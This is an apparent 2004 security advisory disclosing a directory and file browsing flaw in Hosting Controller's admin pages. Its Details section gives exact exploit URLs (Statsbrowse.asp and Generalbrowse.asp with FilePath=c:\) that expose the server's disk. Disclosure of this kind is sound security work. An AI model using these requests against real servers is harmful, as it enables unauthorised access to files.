hostingControl.txt

`  
  
-= Security Advisory =-  
  
Advisory Information  
-------------------------  
  
Software Package : Hosting Controller  
Vendor Homepage : http://www.hostingcontroller.com  
Platforms : Windows based servers  
Vulnerable Versions: All version ( Tested on: v.6.1 Hotfix 1.4 )  
Vendor Contacted : 12/5/2004  
Release Date: : 12/7/2004  
  
Summary  
------------  
  
Hosting Controller is a complete array of Web hosting automation tools for the Windows Server family platform.  
Hosting Controller has a security flaw which allows attackers to browse any file and any directory on that server.  
  
Details  
---------  
  
Vulnerability - Directories Browsing files on the system.  
Foolish vulnerability:  
  
1)This vulnerability is on the admin/mail/Statsbrowse.asp and attackers can view the Harddisk by using this file.  
Login with your account  
http://www.yoursite.com/admin  
Now you see  
http://www.yoursite.com/admin/main.asp  
Change this url to  
http://www.yoursite.com/admin/mail/Statsbrowse.asp?FilePath=c:\&Opt=3&level=1&upflag=0  
  
  
2)This vulnerability is on the admin/iis/Generalbrowse.asp and attackers can view the Harddisk by using this file.  
Login with your account  
http://www.yoursite.com/admin  
Now you see  
http://www.yoursite.com/admin/main.asp  
Change this url to <br/>  
http://www.yoursite.com/admin/iis/Generalbrowse.asp?FilePath=C:\  
  
Solution  
----------  
  
The vender was notified, they have released a patch.  
Update Your software  
  
Credits  
---------  
  
Discovered on May 6, 2004 by (\/) Mouse  
[email protected]  
Additional Research: s7az2mm and bl2k  
http://Shabgard.org  
  
References  
-------------  
  
http://isun.Shabgard.org/hc.html  
http://isun.Shabgard.org/hc.txt  
`